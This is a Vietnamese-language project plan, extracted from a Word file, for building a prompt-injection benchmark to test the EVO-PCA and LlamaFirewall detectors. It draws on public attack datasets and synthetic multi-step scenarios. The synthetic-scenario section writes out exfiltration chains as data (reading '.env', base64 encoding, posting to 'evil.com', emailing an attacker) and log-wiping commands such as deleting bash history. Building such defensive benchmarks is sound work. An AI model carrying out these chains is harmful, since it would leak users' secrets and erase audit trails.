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KẾ HOẠCH TRIỂN KHAI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5696"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Dataset Pipeline cho EVO-PCA v3.6 Benchmark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E569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Thời gian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~5 tuần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Datasets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7 nguồn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Mục tiêu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ABSR +15–20%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Tổng quan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Kế hoạch này mô tả chi tiết quy trình thu thập, xử lý, và ghép 7 datasets từ các nguồn công khai để xây dựng bộ benchmark đánh giá EVO-PCA v3.6. Bộ dataset được thiết kế 3 lớp, mỗi lớp test một nhóm detector khác nhau trong pipeline, đảm bảo không có data leakage so với tập train.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1.1 Ba lớp dataset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Layer 1 — NLP single-action: Test LlamaFirewall Tier 0, Canonicalizer, FPR với text-level attacks.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Layer 2 — Tool call injection: Test PermissionGate, OBVIOUS_KEYWORDS với tool call format.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Layer 3 — Multi-step sequences: Test MultiStepMemoryDetector, IntentFlowDetector với session-level attacks.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1.2 Datasets được chọn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936"/>
        <w:gridCol w:w="1123"/>
        <w:gridCol w:w="2059"/>
        <w:gridCol w:w="2622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Samples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Thay thế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Lý do chọn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prodnull/prompt-injection-repo-dataset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5,671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 (mới)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 NLP categories, obfuscation đủ loại, hard negatives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neuralchemy/Prompt-injection-dataset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~8,000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deepset/prompt-injections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 categories 2026, zero leakage guaranteed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hackaprompt/hackaprompt-dataset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~15K*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Human-written, OOD gold standard, adaptive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microsoft/BIPIA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L2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35,000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InjecAgent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domains khác, confirmed OOD với InjecAgent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microsoft/LLMail-Inject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L2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126,808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126K adaptive attacks, email/tool context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ai-safety-institute/AgentHarm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440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Multi-turn tool calls, benign counterparts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trace-commons/agent-traces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growing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 sessions với session_id, FPR test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Synthetic multi-step (tự tạo)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~200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SOURCE→TRANSFORM→SINK, duy nhất có attack_type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* hackaprompt có ~600K raw, chỉ giữ difficulty ≥ 5 sau filter → ~15K mẫu chất lượng.</w:t>
      </w:r>
    </w:p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THU THẬP &amp; KIỂM TRA NGUỒN</w:t>
            </w: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   │   Tuần 1 — 2–3 ngày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Mục tiêu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Download tất cả 7 datasets, kiểm tra license, xác nhận format schema, phát hiện vấn đề sớm trước khi đầu tư công xử lý.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1.1 Download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prodnull/prompt-injection-repo-dataset — cần login HuggingFace và accept gating conditions trước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neuralchemy/Prompt-injection-dataset — public, download trực tiếp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hackaprompt/hackaprompt-dataset — public, file lớn (~2GB raw)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microsoft/BIPIA — clone từ GitHub: github.com/microsoft/BIPIA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microsoft/LLMail-Inject — huggingface.co/datasets/microsoft/llmail-inject-challenge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ai-safety-institute/AgentHarm — huggingface.co/datasets/ai-safety-institute/AgentHarm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trace-commons/agent-traces — huggingface.co/datasets/trace-commons/agent-traces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1.2 Kiểm tra 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1404"/>
        <w:gridCol w:w="3276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làm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prodnull — Apache 2.0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gating terms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neuralchemy — xác nhận license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Cần check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 file trong repo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hackaprompt — MIT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Sử dụng thoải mái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BIPIA — CC BY-SA 4.0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 required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LLMail-Inject — MIT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README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AgentHarm — MIT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Không redistribute harmful content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agent-traces — CC0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domain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1.3 Schema audit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Kiểm tra từng dataset có đủ các fields bắt buộc cho EVO-PCA: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hoặc text — input string cho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 — 0/1 hoặc benign/malicious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session_id — bắt buộc cho Layer 3 (AgentHarm, agent-traces, synthetic)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attack_type — malicious_single / malicious_multistep / benign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 Lưu ý quan trọng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03030"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fujitsu/agentic-rag-redteam-bench đã bundle InjecAgent bên trong (B4_augmented_injecagent.jsonl) — KHÔNG dùng dataset này. xTRam1/safe-guard-prompt-injection được build từ deepset làm base — vẫn bị leakage. protectai/prompt-injection-validation bundle cả deepset lẫn BIPIA lẫn lộn — KHÔNG dùng.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XỬ LÝ &amp; CHUẨN HÓA</w:t>
            </w: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   │   Tuần 1–2 — ~1 tuần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2.1 Layer 1 — NLP datasets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hackaprompt/hackaprompt-dataset — filter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toàn bộ raw dataset (~600K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Filter: giữ difficulty_level &gt;= 5 (các level thấp là noise, trivial patterns)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Deduplicate: exact-match trên cột prompt sau khi lowercase +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Sample balanced: giữ tối đa 15,000 malicious sau dedup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 sang schema: { action: prompt, label: 'malicious', attack_type: 'malicious_single', session_id: f'hack-{idx}' }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neuralchemy/Prompt-injection-dataset — chuẩn hóa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Dùng config 'core' (original samples, không augmented) để tránh inflate số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Rename column: text →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 label: 1 → 'malicious', 0 → 'benign'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Thêm attack_type: label=1 → 'malicious_single', label=0 → 'benign'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Thêm session_id: f'neur-{idx}'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2.2 Layer 2 — Tool call datasets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microsoft/BIPIA — convert từ GitHub format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bipia import AutoPIABuilder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pia_builder = AutoPIABuilder.from_name('email')(seed=2023)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pia_samples = pia_builder(context_data_file, attack_data_file)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Chạy cho cả 5 tasks: email, web_qa, table_qa, summarization, code_qa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 field 'attack' làm action string (đây là injected instruction)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Tất cả samples là malicious → label='malicious', attack_type='malicious_single'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Tạo benign bằng cách dùng context_data mà không có attack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Thêm session_id: f'bipia-{task}-{idx}'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microsoft/LLMail-Inject — filter theo task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dataset từ HuggingFace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Filter: giữ rows có task_type IN ['tool_call', 'email_action', 'calendar_action'] — bỏ pure text hijacking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 injected_instruction làm action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 label: attack_successful → label='malicious', else 'benign'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Thêm attack_type='malicious_single', session_id=f'llmail-{idx}'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2.3 Layer 3 — Multi-step datasets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ai-safety-institute/AgentHarm — convert trajectory sang action sequences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Đây là bước tốn công nhất. AgentHarm format gốc là task + tool definitions, cần extract tool calls thành chuỗi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dataset, lọc lấy harmful tasks (label='harmful') và benign counterparts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Với mỗi task: chạy qua tool trajectory, extract từng tool call thành action string dạng 'tool_name(arg1, arg2)'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 các tool calls cùng task vào 1 session: session_id = f'agentharm-{task_id}'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Đánh step_index cho mỗi action trong session (0, 1, 2...)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 toàn session: attack_type='malicious_multistep' nếu harmful, 'benign' nếu không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Chỉ label bước cuối cùng là malicious (các bước đầu trông benign — đúng với logic MultiStepMemoryDetector)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trace-commons/agent-traces — extract benign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sessions từ claude_code, cursor, codex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Với mỗi session: extract tool calls theo thứ tự từ messages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Giữ nguyên session_id từ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Tất cả label='benign', attack_type='benign', step_index theo thứ tự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bỏ sessions có &lt; 2 tool calls (quá ngắn để test multi-step logic)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Synthetic multi-step scenarios — tự tạo ~50 scenarios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Không dataset nào có sẵn format SOURCE→TRANSFORM→SINK với session_id. Cần generate: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patterns: read_file('.env'), get_inbox(), get_contacts(), list_files('/home')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TRANSFORM patterns: base64_encode(data), compress(content, 'gz'), json.dumps(secrets)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SINK patterns: http_post('evil.com', body), send_email(attacker, data), upload_s3(bucket)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 patterns: history -c, rm ~/.bash_history, truncate -s 0 /var/log/auth.log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Tạo 50 scenarios × 4–6 steps, mỗi step là 1 action record với session_id, step_index, attack_type='malicious_multistep'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Thêm 20% obfuscation variants: base64 payload, leet speak, zero-width chars trong action strings</w:t>
      </w:r>
    </w:p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DEDUP &amp; GHÉP BỘ</w:t>
            </w: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   │   Tuần 2–3 — 3–4 ngày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3.1 Deduplication pipeline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Dedup theo 3 bước, theo thứ tự từ chặt đến lỏng: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Exact-match dedup: lowercase + strip + hash SHA256 trên action field — loại bỏ duplicates hoàn toàn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Near-duplicate dedup: MinHash LSH với threshold 0.85 — bắt paraphrases gần giống nhau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Cross-dataset check: kiểm tra overlap giữa neuralchemy và hackaprompt (cùng attack categories) — nếu overlap &gt; 20% thì subsample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3.2 Kiểm tra data leakage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Đây là bước quan trọng nhất — mục tiêu chính của việc thay dataset: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train data của EVO-PCA ML model (nếu có) hoặc deepset + InjecAgent originals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Tính similarity giữa mỗi sample trong bộ test mới và toàn bộ train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Threshold: bỏ bất kỳ test sample nào có cosine similarity &gt; 0.9 với bất kỳ train sample nào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số lượng samples bị loại ra per dataset — nếu &gt; 30% bị loại thì dataset đó có vấn đề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3.3 Cân bằng tỉ lệ malicious/benign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Target ratio: 60% malicious / 40% benign — đủ để test recall mà không inflate FPR giả tạo.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1: ~28K malicious, ~20K benign (đủ từ prodnull + neuralchemy)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2: ~161K malicious (BIPIA + LLMail), cần augment benign thêm — lấy từ agent-traces và alpaca-style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3: ~640 malicious sequences (AgentHarm + synthetic), ~200 benign sessions từ agent-traces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3.4 Thêm fields bắt buộc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Sau khi ghép, đảm bảo mọi record có đủ 7 fields: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— input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 — 'benign' hoặc 'malicious'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session_id — unique per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attack_type — 'malicious_single' / 'malicious_multistep' / 'benign'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step_index — 0 cho single-step; 0,1,2... cho multi-step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source_dataset — tên dataset gốc (để debug và ablation study sau này)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augmented — True/False (đánh dấu synthetic samples)</w:t>
      </w:r>
    </w:p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4: VALIDATION &amp; BENCHMARK CHẠY THỬ</w:t>
            </w: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   │   Tuần 3–4 — 1 tuần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4.1 Schema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Chạy script kiểm tra tất cả 7 fields có mặt và đúng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Kiểm tra session_id unique trong Layer 3, không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Kiểm tra step_index liên tục (0,1,2...) trong mỗi session, không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Kiểm tra ratio malicious/benign per layer — flag nếu lệch &gt; 10% so với target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4.2 Sample quality check (manual)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Random sample 50 records từ mỗi dataset nguồn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Kiểm tra: action string có trông như real attack / benign không?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 các mẫu ambiguous — ghi vào log để xem lại sau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Với synthetic multi-step: verify từng scenario đúng SOURCE→TRANSFORM→SINK structure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4.3 Pilot benchmark chạy thử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Chạy thử EVO-PCA pipeline trên 10% dataset mỗi layer trước khi chạy full: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1 pilot: 3,000 samples ngẫu nhiên — kiểm tra FPR và single-step ABSR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2 pilot: 5,000 samples — kiểm tra PermissionGate và OBVIOUS_KEYWORDS trigger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3 pilot: 10 sessions × 4 steps — kiểm tra MultiStepMemoryDetector fire đúng step nào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 sánh FPR với baseline hiện tại (2.29%) — nếu FPR &gt; 5% thì cần review benign pool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4.4 Điều chỉnh dựa trên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Nếu FPR cao bất thường: review benign samples xem có samples trông như attack không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Nếu ABSR-Single thấp: review xem OBVIOUS_KEYWORDS và LF Tier 0 có match đúng không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Nếu ABSR-Multi thấp: verify session_id grouping đúng chưa, step_index không bị shuffle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Điều chỉnh T0_BENIGN_CAP nếu cần (đề xuất: thử 65 vs 72 và so sánh)</w:t>
      </w:r>
    </w:p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5: CHẠY FULL BENCHMARK &amp; BÁO CÁO</w:t>
            </w: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   │   Tuần 4–5 — 3–4 ngày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5.1 Chạy full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Chạy EVO-PCA pipeline trên toàn bộ dataset (kể cả so sánh với LlamaFirewall standalone và combo)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Ghi lại FPR, ABSR-Total, ABSR-Single, ABSR-Multi, FPR-Steady-State per dataset nguồn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Ablation study: bật/tắt từng code fix (FIX-1 đến FIX-4 trong patch v4.6) để đo contribution riêng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Lưu raw predictions để phân tích chi tiết sau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5.2 Các chỉ số cần báo cáo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1404"/>
        <w:gridCol w:w="3276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làm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FPR (%)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dataset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Positive Rate — giữ nguyên mức hiện tại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ABSR-Total (%)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dataset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Attack Block Success Rate tổng (target tăng từ 26.27%)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ABSR-Single (%)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55%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1 + 2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Single-step attacks — LF + EVO-PCA combined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ABSR-Multi (%)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35%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Multi-step sequences — điểm mạnh của EVO-PCA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FPR-Steady-State (%)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3.5%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Benign pool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FPR sau warmup period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Per-dataset ABSR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Mỗi nguồn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Ablation — nguồn nào dễ/khó nhất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696"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 So sánh với baseline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Report so sánh với benchmark AgentDojo hiện tại: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LlamaFirewall standalone: 22.88% ABSR (baseline)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EVO-PCA + LlamaFirewall (AgentDojo): 26.27% ABSR (current)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EVO-PCA + LlamaFirewall (bộ dataset mới): target &gt; 40% ABSR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Lưu ý: số không so sánh trực tiếp được do khác dataset — cần nêu rõ trong báo cáo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Rủi ro và phương án xử lý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Rủi ro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Khả năng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Mức độ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Phương án xử lý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BIPIA format thay đổi so với paper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Dùng MAlmasabi/Indirect-Prompt-Injection-BIPIA-GPT làm backup — đã pre-processed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AgentHarm trajectory convert sai logic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verify 20 sessions trước khi scale. Nếu sai: dùng task description làm action string thay vì extract tool calls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LLMail-Inject có ít tool call samples sau filter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Thấp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Nếu &lt; 5,000 sau filter: mở rộng task_type filter hoặc bổ sung bằng BIPIA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Leakage check phát hiện overlap cao trong hackaprompt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Thấp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Subsample hackaprompt xuống còn 5,000, ưu tiên high-difficulty levels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Synthetic scenarios quá đơn giản, ABSR giả cao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Trung bình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Thêm 20% obfuscation variants. Review manual 10 scenarios trước khi dùng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FPR tăng cao sau khi thêm benign từ agent-traces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Thấp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 agent-traces: bỏ sessions có bất kỳ network call ra ngoài domain nội bộ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Timeline tóm tắt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1404"/>
        <w:gridCol w:w="3276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làm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6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1: Thu thập &amp; kiểm tra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Ngày 1–3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datasets downloaded, license OK, schema audit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2: Xử lý &amp; chuẩn hóa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Ngày 4–8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 convert, filter, schema mapping cho tất cả sources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3: Dedup &amp; ghép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Ngày 9–12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Bộ dataset sạch, deduped, balanced, đủ 7 fields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4: Validation &amp; pilot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Ngày 13–18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valid, pilot benchmark pass, adjustments done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5: Full benchmark &amp; báo cáo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Ngày 19–23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numbers, ablation study, comparison report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5696" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="12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EVO-PCA Dataset Pipeline Plan — v1.0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6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2026-06-28T16:52:56.902Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-28T16:52:56.902Z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